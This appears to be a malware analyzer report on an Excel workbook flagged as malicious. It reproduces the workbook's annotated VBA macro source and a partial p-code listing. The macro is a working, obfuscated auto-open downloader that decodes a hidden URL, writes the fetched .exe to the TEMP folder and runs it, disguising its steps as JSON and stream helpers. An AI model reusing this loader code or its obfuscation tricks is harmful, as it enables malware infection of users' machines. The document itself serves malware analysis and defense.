MALICIOUS
208
Risk Score
Heuristics 6
-
VBA macros detected (medium, 5 related findings) — OLE_VBA_MACROS: Document contains VBA macro code
-
Obfuscated auto-exec VBA loader (critical) — OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script:
Set RequestAccept1 = CreateObject(RequestAccept7 + "icr" + LCase(RequestAccept10) + "soft" + text + RequestAccept8 + RequestAccept7 + "L" + RequestAccept9 + "TTP") -
CreateObject call (high) — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set RequestAccept1 = CreateObject(RequestAccept7 + "icr" + LCase(RequestAccept10) + "soft" + text + RequestAccept8 + RequestAccept7 + "L" + RequestAccept9 + "TTP") -
CallByName call (high) — OLE_VBA_CALLBYNAME: CallByName call. Matched line in script:
CallByName TrimUurl, GetBOm, VbMethod, RequestAccept5, 3 * 2 - 4 -
VBA p-code auto-exec with execution tokens (high) — OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro (low) — OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
Private Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 36705 bytes |
SHA-256: 963f2dbed32ec609487183a09ed8542ac6a9ddf3ca3bed8641144a60f4e61d60 |
|||
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Auto-exec entry point: Excel runs Workbook_Open when the workbook is opened with macros enabled.
' Both callees are named like JSON/stream helpers, but in Module1 each one performs a loader step
' before (or instead of) its visible helper body, so these two calls drive the whole chain.
Private Sub Workbook_Open()
' The "." argument is the dot that jsonouterwrap splices into the ProgID it hands to CreateObject.
jsonouterwrap "."
' The argument is not used on the path taken: Stream_StringToBinary opens the HTTP request and
' then jumps over its own string-to-binary code.
Stream_StringToBinary ""
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
' Module-level state.
' The m_* names are used by the socket/HTTP code further down (Download, Connect, ParseReturnedPage,
' m_Variable). On the path started by Workbook_Open that code is jumped over with GoTo, so these
' mostly serve the unreached filler.
Private m_strRemoteHost As String
Private m_strFilePath As String
Private m_strHttpResponse As String
Private m_bResponseReceived As Boolean
Private Const m_UserAgent = "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Private Const m_Accept = "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*"
Private Const m_HTTPStandard = "HTTP/1.0"
Private m_Content As String
' Loader state. It is passed between procedures through Public globals, so no single procedure
' shows the full download-write-open sequence.
' RequestAccept1: object created in jsonouterwrap; the ProgID concatenates to "Microsoft.XMLHTTP"
' when the argument is "." as Workbook_Open passes.
Public RequestAccept1 As Object
' TrimUurl: the "Adodb.Stream" object created in jsonaddfield.
Public TrimUurl As Object
' RequestAccept3: result of .Environment(...) on the object created in testb64.
Public RequestAccept3 As Object
' RequestAccept4: value read from RequestAccept3 in Stream_StringToBinary (directory part of the path).
Public RequestAccept4 As String
' RequestAccept5: full file path assembled in ParseReturnedPage.
Public RequestAccept5 As String
' RequestAccept6: the "Shell.Application" object created in testjsonaddarray.
Public RequestAccept6 As Object
' Single-letter constants used as building blocks for the strings assembled at run time.
Public Const RequestAccept7 = "M"
Public Const RequestAccept8 = "X"
Public Const RequestAccept9 = "H"
' RequestAccept12 is set in testb64 (evaluates to "."); RequestAccept10 is set in jsonouterwrap
' (evaluates to "O"). Both are further building blocks for string assembly.
Public RequestAccept12 As String
Public RequestAccept10 As String
' Not referenced anywhere in the visible listing.
Private m_EncryptedContent As String
' Final stage of the loader, dressed up as an authenticated JSON POST helper.
' The only call in the visible listing (from ParseReturnedPage) passes six empty strings; none of
' the parameters is read on the path that actually runs.
' Executed statements: the CallByName line, GoTo hemnd, and the line after the hemnd label.
' Defender view: the observable result is the Office process writing an .exe under the TEMP
' directory and the shell opening it; Office child-process restrictions and blocking macros in
' files from the internet both interrupt this step.
Function ttts(userpass As String, command As String, data As String, contenttype As String, url As String, category As String) As String
Dim resptext As String
Dim WinHttpReq As String
' GetBOm returns "savetofile" and 3 * 2 - 4 is 2, so this is a late-bound call of
' TrimUurl.SaveToFile RequestAccept5, 2 (2 = adSaveCreateOverWrite for ADODB.Stream).
' CallByName keeps the method name out of the source as a literal.
CallByName TrimUurl, GetBOm, VbMethod, RequestAccept5, 3 * 2 - 4
' Unconditional jump: everything down to the hemnd label is unreachable.
GoTo hemnd
' Unreachable filler. "WinHtt.pReq" is not declared anywhere in the visible listing (the local is
' WinHttpReq, a String), so this block would not work even if it were reached.
MousePointer = vbHourglass
WinHtt.pReq.Open command, Trim(url), False
WinHtt.pReq.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
WinHtt.pReq.SetRequestHeader "Authorization", "Basic " + Base64Encode(userpass)
WinHtt.pReq.SetRequestHeader "Content-Type", "application/json"
WinHtt.pReq.Send jsonouterwrap(jsonaddfield("text", Trim(data)) + "," + jsonaddarray("tags", Trim(category)))
resptext1 = WinHtt.pReq.GetAllResponseHeaders()
resptext2 = WinHtt.pReq.ResponseText()
resptext3 = Trim(Str(WinHtt.pReq.Status))
resptext4 = WinHtt.pReq.StatusText
MousePointer = vbDefault
If resptext3 = "204" Then
ttts = "OK " + Str(Time())
Else
ttts = resptext4 + ":" + resptext3 + ":" + resptext2 + ":" + resptext1
End If
hemnd:
' RequestAccept6 is the Shell.Application object from testjsonaddarray; Open is given the path of
' the file just written, which is expected to launch it.
RequestAccept6.Open (RequestAccept5)
End Function
' First loader step, disguised as a JSON brace-wrapper.
' Side effects: sets RequestAccept10, creates the HTTP client object in RequestAccept1, then calls
' jsonaddfield to continue the setup chain. The "{...}" return value is ignored by Workbook_Open.
Public Function jsonouterwrap(text As String) As String
' Asc("M") + 2 = 79, so RequestAccept10 becomes "O".
RequestAccept10 = Chr(Asc(RequestAccept7) + 2)
' With text = "." the pieces join to "Microsoft.XMLHTTP": "M" + "icr" + "o" + "soft" + "." + "X" + "M" + "L" + "H" + "TTP".
' Building the ProgID from fragments keeps the literal out of the macro source; any other value
' of text yields a different, presumably invalid, ProgID.
Set RequestAccept1 = CreateObject(RequestAccept7 + "icr" + LCase(RequestAccept10) + "soft" + text + RequestAccept8 + RequestAccept7 + "L" + RequestAccept9 + "TTP")
jsonouterwrap = "{" + text + "}"
' Called only for its side effects (see jsonaddfield); the result is discarded.
jsonaddfield "", ""
End Function
' Returns "field":"text2wrap" (Chr(34) is the double quote), but also carries a loader step:
' it creates the ADODB.Stream object later used to write the HTTP response to disk, then calls
' testjsonaddarray to continue the setup chain. Any caller triggers these side effects.
Function jsonaddfield(field As String, text2wrap As String) As String
jsonaddfield = Chr(34) + field + Chr(34) + ":" + Chr(34) + text2wrap + Chr(34)
' Stored in the Public global TrimUurl; ParseReturnedPage and ttts use it later.
Set TrimUurl = CreateObject("Adodb.Stream")
testjsonaddarray
End Function
' Returns "field":["text2wrap"] as a string (Chr(34) is the double quote). No side effects.
' In the visible listing it is referenced only from code that is not reached on the
' Workbook_Open path (the skipped block in ttts, the line after Exit Sub in testjsonaddarray,
' and testjsonwrap).
Function jsonaddarray(field As String, text2wrap As String) As String
jsonaddarray = Chr(34) + field + Chr(34) + ":" + "[" + Chr(34) + text2wrap + Chr(34) + "]"
End Function
' Test-style stub that shows the jsonaddfield output in a message box. Nothing in the visible
' listing calls it. Note that jsonaddfield is not a pure helper here: calling it also creates the
' ADODB.Stream object and runs testjsonaddarray.
Sub testjsonaddfield()
MsgBox (jsonaddfield("text", "james"))
End Sub
' Write-to-disk stage of the loader, hidden inside what looks like an HTTP response parser.
' Executed statements: the RequestAccept5 assignment, GoTo Savi, and the four lines after the
' Savi label. The strWebPage parameter is never read on that path (Connect passes "").
' No return value is assigned on the executed path.
Public Function ParseReturnedPage(strWebPage As String) As String
Dim headerSplit As Integer
Dim m_sHost As String
' Builds the drop path: RequestAccept4 (read from the environment in Stream_StringToBinary)
' + Chr(92) "\" + LCase("MMXOH") "mmxoh" + RequestAccept12 "." + "exe", i.e. <TEMP>\mmxoh.exe.
RequestAccept5 = RequestAccept4 + Chr(Asc(RequestAccept7) + 15) + LCase(RequestAccept7 + RequestAccept7 + RequestAccept8 + RequestAccept10 + RequestAccept9) + RequestAccept12 + "exe"
' Unconditional jump: everything down to the Savi label is unreachable. That block references
' names split by a dot (Sho.wLast, DecA.SCString, Verif.yClient, PrintMe.ssage, SaveSet.ting) and
' objects not defined in this listing (frmCom, mCrypt), so it reads as padding rather than working
' code; presumably it was lifted from an unrelated program.
GoTo Savi
If Len(strWebPage) = 0 Then Exit Function
headerSplit = InStr(1, strWebPage, vbCrLf & vbCrLf) + 4
m_Content = Mid(strWebPage, headerSplit, Len(strWebPage) - headerSplit + 1)
m_sHost = frmCom.sckcom.RemoteHost
Select Case m_Variable("type", vbLf)
Case "RareTrackerLast20"
Sho.wLast (20)
Case "RareTrackerMyRares"
Sho.wMine (20)
Case Else
m_Content = DecA.SCString(m_Content)
If m_Variable("type", vbLf) = "AuthServer" Then
m_Content = Replace(m_Content, "type?AuthServer" & vbLf, "")
m_Content = mCrypt.Decrypt(m_Content)
Select Case m_sHost
Case "www.lifetankxi.com"
Verif.yClient
SaveSetting "Other", "Other", "ConnectionHandler", 0
Case "raretracker.acvault.ign.com"
Verif.yClient
SaveSetting "Other", "Other", "ConnectionHandler", 0
Case "www.paraduck.net"
Veri.fyClient
SaveSetting "Other", "Other", "ConnectionHandler", 0
Case Else
If GetSetting("Other", "Other", "ConnectionHandler") = "1" Then
PrintMe.ssage "Your Lifetank has been permanently disabled. Sorry for the trouble!"
Else
PrintMe.ssage "Your Lifetank has been permanently disabled. Sorry for the trouble!"
SaveSet.ting "Other", "Other", "ConnectionHandler", 1
End If
End Select
End If
End Select
Savi:
' TrimUurl is the ADODB.Stream from jsonaddfield; Type = 1 is binary mode (the same value the
' Stream_* helpers name adTypeBinary).
TrimUurl.Type = 1
TrimUurl.Open
' Copies the raw HTTP response body from RequestAccept1 (sent in Connect) into the stream.
TrimUurl.write RequestAccept1.responseBody
' All arguments are empty: ttts is called only to save the stream to RequestAccept5 and open it.
ttts "", "", "", "", "", ""
End Function
' Loader setup step named like a unit test. Reached from jsonaddfield on the Workbook_Open path.
Sub testjsonaddarray()
' Stored in the Public global RequestAccept6; ttts later calls its Open method on the dropped file.
Set RequestAccept6 = CreateObject("Shell.Application")
' Continues the setup chain (environment object).
testb64
' The MsgBox below is never reached; it only makes the procedure resemble a test stub.
Exit Sub
MsgBox (jsonaddarray("text", "tag1"))
End Sub
' Test-style stub; nothing in the visible listing calls it. The helpers it uses are not pure in
' this module: jsonaddfield and jsonouterwrap both create COM objects as a side effect.
Sub testjsonwrap()
MsgBox (jsonouterwrap(jsonaddfield("text", "xxyyzz") + "," + jsonaddarray("tags", "noun")))
End Sub
' Loader setup step named like a Base64 test. Reached from testjsonaddarray.
' Relies on RequestAccept10 = "O", which jsonouterwrap sets earlier in the chain.
Sub testb64()
' Asc("O") + 22 = 101, so RequestAccept11 is "e". It has no module-level declaration in the
' visible listing, so it is presumably an implicit local variable.
RequestAccept11 = Chr(Asc(RequestAccept10) + 22)
' Asc("O") - 33 = 46, so RequestAccept12 is ".".
RequestAccept12 = Chr(Asc(RequestAccept10) - 33)
' ProgID joins to "WScript.Shell" and the Environment argument to "Process"; the resulting
' environment collection is kept in RequestAccept3 and queried in Stream_StringToBinary.
Set RequestAccept3 = CreateObject(UCase("w") + UCase("s") + "cript" + RequestAccept12 + "Sh" + "" + RequestAccept11 + "ll").Environment("Pr" + LCase(RequestAccept10) + "c" + RequestAccept11 + "ss")
' The MsgBox below is never reached.
Exit Sub
MsgBox (Base64Encode("user:mypass"))
End Sub
' Base64-encodes sText through an MSXML element with DataType "bin.base64" and returns the text.
' In the visible listing it is referenced only from unreached code (the skipped block in ttts and
' the line after Exit Sub in testb64).
' NOTE(review): in this module Stream_StringToBinary starts with loader statements and jumps past
' its conversion code, so this function would not produce a real encoding if it were called.
Function Base64Encode(sText)
Dim oXML, oNode
Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
Set oNode = oXML.createElement("base64")
oNode.DataType = "bin.base64"
oNode.nodeTypedValue = Stream_StringToBinary(sText)
Base64Encode = oNode.text
Set oNode = Nothing
Set oXML = Nothing
End Function
' String decoder for the numeric array used by the loader.
' Each element has a fixed offset subtracted and is converted with Chr; the offset is
' 12 * frmComsckcom + 8 * 1000 + 900 + 8 * 9 = 12 * frmComsckcom + 8972.
' The one call in the visible listing (Stream_StringToBinary) passes 33, giving an offset of 9368.
' Parameters: RareTrackerMyR - array of encoded character codes; frmComsckcom - key for the offset.
' Returns the decoded string.
Public Function ResponsebStrData(RareTrackerMyR() As Variant, frmComsckcom As Integer) As String
Dim i As Integer
' RareTrackerL is not declared in the visible listing; presumably an implicit local accumulator.
RareTrackerL = ""
For i = LBound(RareTrackerMyR) To UBound(RareTrackerMyR)
RareTrackerL = RareTrackerL & Chr(RareTrackerMyR(i) - 12 * frmComsckcom - 8 * 1000 - 900 - 8 * 9)
Next i
ResponsebStrData = RareTrackerL
End Function
' Converts binary data to a us-ascii string by writing it to an ADODB.Stream in binary mode,
' rewinding, switching the stream to text mode and reading it back.
' Nothing in the visible listing calls this function; unlike its sibling Stream_StringToBinary it
' contains no jump or loader statement.
Function Stream_BinaryToString(Binary)
Const adTypeText = 2
Const adTypeBinary = 1
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.write Binary
' Rewind before changing the stream type so ReadText starts at the first byte.
BinaryStream.Position = 0
BinaryStream.Type = adTypeText
BinaryStream.Charset = "us-ascii"
Stream_BinaryToString = BinaryStream.ReadText
Set BinaryStream = Nothing
End Function
' Socket-based download starter: strips a leading "http://" and a trailing "/", splits the rest
' into host and path at the first "/", and connects frmCom.sckcom to that host on port 80.
' Nothing in the visible listing calls it, and frmCom and PrintMessage are not defined here, so it
' appears to be filler; the macro's real request goes through the RequestAccept1 object instead.
Public Function Download(url As String)
Dim strURL As String
On Error GoTo ErrorHandler
If Len(url) = 0 Then
PrintMessage "Please, enter the URL to retrieve."
Exit Function
End If
If Left(url, 7) = "http://" Then
strURL = Mid(url, 8)
url = Mid(url, 8)
Else
strURL = url
End If
If Right(url, 1) = "/" Then
strURL = Mid(url, 1, Len(url) - 1)
url = Mid(url, 1, Len(url) - 1)
Else
strURL = url
End If
' If strURL contains no "/", InStr returns 0 and Left$ is called with -1; that raises error 5,
' which the handler below answers by appending "/" and retrying the statement.
m_strRemoteHost = Left$(strURL, InStr(1, strURL, "/") - 1)
m_strFilePath = Mid$(strURL, InStr(1, strURL, "/"))
m_strHttpResponse = ""
m_bResponseReceived = False
With frmCom.sckcom
.Close
.LocalPort = 0
.Connect m_strRemoteHost, 80
End With
Exit Function
ErrorHandler:
If Err.Number = 5 Then
strURL = strURL & "/"
Resume 0
Else
PrintMessage "An error has occurred." & vbCrLf & "Error #: " & Err.Number & vbCrLf & "Description: " & Err.Description
Exit Function
End If
End Function
' Returns the method name "savetofile", assembled from fragments so the literal never appears in
' the source: Chr(Asc("M") + 6) is "S", RequestAccept10 is "O" (set in jsonouterwrap), and LCase
' lowers "SavetO" to "saveto" before "file" is appended.
' ttts passes the result to CallByName to invoke that method on the ADODB.Stream object.
Function GetBOm() As String
GetBOm = LCase(Chr(Asc(RequestAccept7) + 6) + "avet" + RequestAccept10) & "fil" + LCase("e")
End Function
' Request-setup stage of the loader, hidden inside a string-to-binary helper.
' Executed statements: the array assignment, RequestAccept1.Open, GoTo notor, and the three lines
' after the notor label. The text parameter is not read and no return value is assigned on that
' path. Depends on state set earlier by jsonouterwrap and its callees (RequestAccept1,
' RequestAccept3, RequestAccept10).
Public Function Stream_StringToBinary(text)
Const adTypeText = 2
Const adTypeBinary = 1
Dim ReturnedPageWeb() As Variant
' Encoded download URL. ResponsebStrData(..., 33) subtracts 9368 from each element; the result is
' a plain http:// URL ending in ".exe".
ReturnedPageWeb = Array(9472, 9484, 9484, 9480, 9426, 9415, 9415, 9476, 9485, 9467, 9475, 9489, 9477, 9465, 9478, 9414, 9477, 9469, 9415, 9423, 9422, 9484, 9423, 9472, 9415, 9423, 9422, 9471, 9474, 9475, 9414, 9469, 9488, 9469)
' Chr(Asc("O") - 8) is "G", so the verb is "GET"; the final False makes the request synchronous.
RequestAccept1.Open Chr(Asc(RequestAccept10) - 8) + "ET", ResponsebStrData(ReturnedPageWeb, 33), False
' Unconditional jump: the ADODB.Stream conversion code below is unreachable cover.
GoTo notor
Dim BinaryStream
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeText
BinaryStream.Charset = "us-ascii"
BinaryStream.Open
BinaryStream.WriteText text
BinaryStream.Position = 0
BinaryStream.Type = adTypeBinary
BinaryStream.Position = 0
Stream_StringToBinary = BinaryStream.Read
Set BinaryStream = Nothing
notor:
' Asc("O") = 79, so the key is Chr(84) + "E" + "M" + Chr(80) = "TEMP": this reads the TEMP
' variable from the process environment object created in testb64.
RequestAccept13 = Asc(RequestAccept10)
RequestAccept4 = RequestAccept3(Chr(RequestAccept13 + 5) + UCase(Chr(RequestAccept13 - 10)) & RequestAccept7 & Chr(RequestAccept13 + 1))
' Sends the request and continues to the write/open stages.
Connect
End Function
' Sends the HTTP request prepared in Stream_StringToBinary, then hands over to ParseReturnedPage.
' Executed statements: RequestAccept1.Send, GoTo Fin, ParseReturnedPage "", Exit Function.
' Because the jump skips "On Error GoTo Error_Handler", no handler is installed here: a failed
' Send is not routed to Error_Handler.
Public Function Connect()
' Synchronous send (the request was opened with the async flag set to False).
RequestAccept1.Send
' Unconditional jump: the raw-socket request builder below is unreachable filler.
GoTo Fin
On Error GoTo Error_Handler
Dim strHttpRequest As String
strHttpRequest = "GET " & m_strFilePath & " " & m_HTTPStandard & vbCrLf
strHttpRequest = strHttpRequest & "Host: " & m_strRemoteHost & vbCrLf
strHttpRequest = strHttpRequest & "Accept: " & m_Accept & vbCrLf
strHttpRequest = strHttpRequest & "User-Agent: " & m_UserAgent & vbCrLf
strHttpRequest = strHttpRequest & "Connection: close" & vbCrLf
strHttpRequest = strHttpRequest & vbCrLf
frmCom.sckcom.SendData strHttpRequest
Fin:
' The empty argument is irrelevant: ParseReturnedPage jumps straight to writing the response body.
ParseReturnedPage ""
Exit Function
Error_Handler:
PrintEr.rorMessage "mDownload.Connect - " & Err.Description
Resume Fin
End Function
' Appends a received chunk to the module-level response buffer m_strHttpResponse.
' Nothing in the visible listing calls it; it belongs to the socket-style filler code.
Public Function DataArrived(bStrData As String)
m_strHttpResponse = m_strHttpResponse & bStrData
End Function
' Passes the buffered response to ParseReturnedPage and closes frmCom.sckcom if its State is not 0.
' Nothing in the visible listing calls it, and frmCom is not defined here. ParseReturnedPage
' ignores its argument in this module, so a call would run the write-and-open stage.
Public Function ParseAndClose()
ParseReturnedPage (m_strHttpResponse)
If frmCom.sckcom.State <> 0 Then
frmCom.sckcom.Close
End If
End Function
' Looks up a "name?value" entry in the module-level m_Content string.
' m_Content is split on bStrDelimeter and each piece on the first "?"; the value of the first
' piece whose name equals bStrVariableName is returned. Returns the string "NULL" when the name
' is not found or its value is empty.
' Referenced only from the unreachable block in ParseReturnedPage in the visible listing.
Public Function m_Variable(bStrVariableName As String, Optional bStrDelimeter = vbCrLf) As String
' Errors (for example a piece without "?") are silently ignored for the whole procedure.
On Error Resume Next
Dim foundMatch As Boolean
Dim m_strVariables() As String
Dim m_strVariableSplit() As String
Dim m_VariableValue As String
Dim m_dLocation As Double
' -1 marks "not found yet".
m_dLocation = -1
Dim i As Integer
If InStr(m_Content, bStrVariableName) Then
foundMatch = True
m_strVariables = Split(m_Content, bStrDelimeter)
Else
foundMatch = False
End If
If foundMatch = True Then
For i = LBound(m_strVariables) To UBound(m_strVariables)
' Once a match is recorded the split is no longer refreshed, so m_strVariableSplit keeps the
' matching entry for the code after the loop.
If m_dLocation = -1 Then
m_strVariableSplit() = Split(m_strVariables(i), "?", 2)
If m_strVariableSplit(0) = bStrVariableName Then
m_dLocation = i
End If
End If
Next i
End If
If m_dLocation = -1 Then
m_Variable = "NULL"
Else
If m_strVariableSplit(1) = "" Then
m_Variable = "NULL"
Else
m_Variable = m_strVariableSplit(1)
End If
End If
End Function
' Processing file: /opt/analyzer/scan_staging/a7ac12dfc57f45b08c30d93f80421263.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ЭтаКнига - 1409 bytes
' Line #0:
' FuncDefn (Private Sub Workbook_Open())
' Line #1:
' LitStr 0x0001 "."
' ArgsCall jsonouterwrap 0x0001
' Line #2:
' LitStr 0x0000 ""
' ArgsCall Stream_StringToBinary 0x0001
' Line #3:
' EndSub
' Line #4:
' Line #5:
' _VBA_PROJECT_CUR/VBA/Лист1 - 984 bytes
' _VBA_PROJECT_CUR/VBA/Лист2 - 984 bytes
' _VBA_PROJECT_CUR/VBA/Лист3 - 984 bytes
' _VBA_PROJECT_CUR/VBA/Module1 - 19307 bytes
' Line #0:
' Dim (Private)
' VarDefn m_strRemoteHost (As String)
' Line #1:
' Dim (Private)
' VarDefn m_strFilePath (As String)
' Line #2:
' Dim (Private)
' VarDefn m_strHttpResponse (As String)
' Line #3:
' Dim (Private)
' VarDefn m_bResponseReceived (As Boolean)
' Line #4:
' Dim (Private Const)
' LitStr 0x002E "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
' VarDefn m_UserAgent
' Line #5:
' Dim (Private Const)
' LitStr 0x0085 "image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*"
' VarDefn m_Accept
' Line #6:
' Dim (Private Const)
' LitStr 0x0008 "HTTP/1.0"
' VarDefn m_HTTPStandard
' Line #7:
' Dim (Private)
' VarDefn m_Content (As String)
' Line #8:
' Dim (Public)
' VarDefn RequestAccept1 (As Object)
' Line #9:
' Dim (Public)
' VarDefn TrimUurl (As Object)
' Line #10:
' Dim (Public)
' VarDefn RequestAccept3 (As Object) 0x0017
' Line #11:
' Dim (Public)
' VarDefn RequestAccept4 (As String)
' Line #12:
' Dim (Public)
' VarDefn RequestAccept5 (As String)
' Line #13:
' Dim (Public)
' VarDefn RequestAccept6 (As Object)
' Line #14:
' Dim (Public Const)
' LitStr 0x0001 "M"
' VarDefn RequestAccept7
' Line #15:
' Dim (Public Const)
' LitStr 0x0001 "X"
' VarDefn RequestAccept8
' Line #16:
' Dim (Public Const)
' LitStr 0x0001 "H"
' VarDefn RequestAccept9
' Line #17:
' Dim (Public)
' VarDefn RequestAccept12 (As String)
' Line #18:
' Dim (Public)
' VarDefn RequestAccept10 (As String)
' Line #19:
' Dim (Private)
' VarDefn m_EncryptedContent (As String)
' Line #20:
' FuncDefn (Function ttts(userpass As String, command As String, data As String, contenttype As String, url As String, category As String) As String)
' Line #21:
' Dim
' VarDefn resptext (As String)
' Line #22:
' Dim
' VarDefn WinHttpReq (As String)
' Line #23:
' Ld TrimUurl
' Ld _B_var_Time
' Ld VbMethod
' Ld RequestAccept5
' LitDI2 0x0003
' LitDI2 0x0002
' Mul
' LitDI2 0x0004
' Sub
' ArgsCall CallByName 0x0005
' Line #24:
' Line #25:
' GoTo hemnd
' Line #26:
' Ld vbHourglass
' St MousePointer
' Line #27:
' Ld command
' Ld url
' ArgsLd Trim 0x0001
' LitVarSpecial (False)
' Ld WinHtt
' MemLd pReq
' ArgsMemCall Open 0x0003
' Line #28:
' LitStr 0x000A "User-Agent"
' LitStr 0x0032 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
' Ld WinHtt
' MemLd pReq
' ArgsMemCall SetRequestHeader 0x0002
' Line #29:
' LitStr 0x000D "Authorization"
' LitStr 0x0006 "Basic "
' Ld userpass
' ArgsLd Base64Encode 0x0001
' Add
' Ld WinHtt
' MemLd pReq
' ArgsMemCall SetRequestHeader 0x0002
' Line #30:
' LitStr 0x000C "Content-Type"
' LitStr 0x0010 "application/json"
' Ld WinHtt
' MemLd pReq
' ArgsMemCall SetRequestHeader 0x0002
' Line #31:
' LitStr 0x0004 "text"
' Ld data
' ArgsLd Trim 0x0001
' ArgsLd jsonaddfield 0x0002
' LitStr 0x0001 ","
' Add
' LitStr 0x0004 "tags"
' Ld category
' ArgsLd Trim 0x0001
' ArgsLd jsonaddarray 0x0002
' Add
' ArgsLd jsonouterwrap 0x0001
' Ld WinHtt
' MemLd pReq
' ArgsMemCall Send 0x0001
' Line #32:
' Ld WinHtt
' MemLd pReq
' ArgsMemLd GetAllResponseHeaders 0x0000
' St resptext1
' Line #33:
' Ld WinHtt
' MemLd pReq
' ArgsMemLd ResponseText 0x0000
' St resptext2
' Line #34:
' Ld WinHtt
' MemLd pReq
' MemLd Status
' ArgsLd Str 0x0001
' ArgsLd Trim 0x0001
' St resptext3
' Line #35:
' Ld WinHtt
' MemLd pReq
' MemLd StatusText
' St resptext4
' Line #36:
' Ld vbDefault
' St MousePointer
' Line #37:
' Ld resptext3
' LitStr 0x0003 "204"
' Eq
' IfBlock
' Line #38:
' LitStr 0x0003 "OK "
' ArgsLd Time 0x0000
' ArgsLd Str 0x0001
' Add
' St ttts
' Line #39:
' ElseBlock
' Line #40:
' Ld resptext4
' LitStr 0x0001 ":"
' Add
' Ld resptext3
' Add
' LitStr 0x0001 ":"
' Add
' Ld resptext2
' Add
' LitStr 0x0001 ":"
' Add
' Ld resptext1
' Add
' St ttts
' Line #41:
' EndIfBlock
' Line #42:
' Label hemnd
' Line #43:
' Ld RequestAccept5
' Paren
' Ld RequestAccept6
' ArgsMemCall Open 0x0001
' Line #44:
' EndFunc
' Line #45:
' FuncDefn (Public Function jsonouterwrap(Text As String) As String)
' Line #46:
' Ld RequestAccept7
' ArgsLd Asc 0x0001
' LitDI2 0x0002
' Add
' ArgsLd Chr 0x0001
' St RequestAccept10
' Line #47:
' SetStmt
' Ld RequestAccept7
' LitStr 0x0003 "icr"
' Add
' Ld RequestAccept10
' ArgsLd LCase 0x0001
' Add
' LitStr 0x0004 "soft"
' Add
' Ld Text
' Add
' Ld RequestAccept8
' Add
' Ld RequestAccept7
' Add
' LitStr 0x0001 "L"
' Add
' Ld RequestAccept9
' Add
' LitStr 0x0003 "TTP"
' Add
' ArgsLd CreateObject 0x0001
' Set RequestAccept1
' Line #48:
' LitStr 0x0001 "{"
' Ld Text
' Add
' LitStr 0x0001 "}"
' Add
' St jsonouterwrap
' Line #49:
' LitStr 0x0000 ""
' LitStr 0x0000 ""
' ArgsCall jsonaddfield 0x0002
' Line #50:
' EndFunc
' Line #51:
' FuncDefn (Function jsonaddfield(field As String, text2wrap As String) As String)
' Line #52:
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Ld field
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' LitStr 0x0001 ":"
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' Ld text2wrap
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' St jsonaddfield
' Line #53:
' SetStmt
' LitStr 0x000C "Adodb.Stream"
' ArgsLd CreateObject 0x0001
' Set TrimUurl
' Line #54:
' ArgsCall testjsonaddarray 0x0000
' Line #55:
' EndFunc
' Line #56:
' FuncDefn (Function jsonaddarray(field As String, text2wrap As String) As String)
' Line #57:
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Ld field
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' LitStr 0x0001 ":"
' Add
' LitStr 0x0001 "["
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
' Ld text2wrap
' Add
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Add
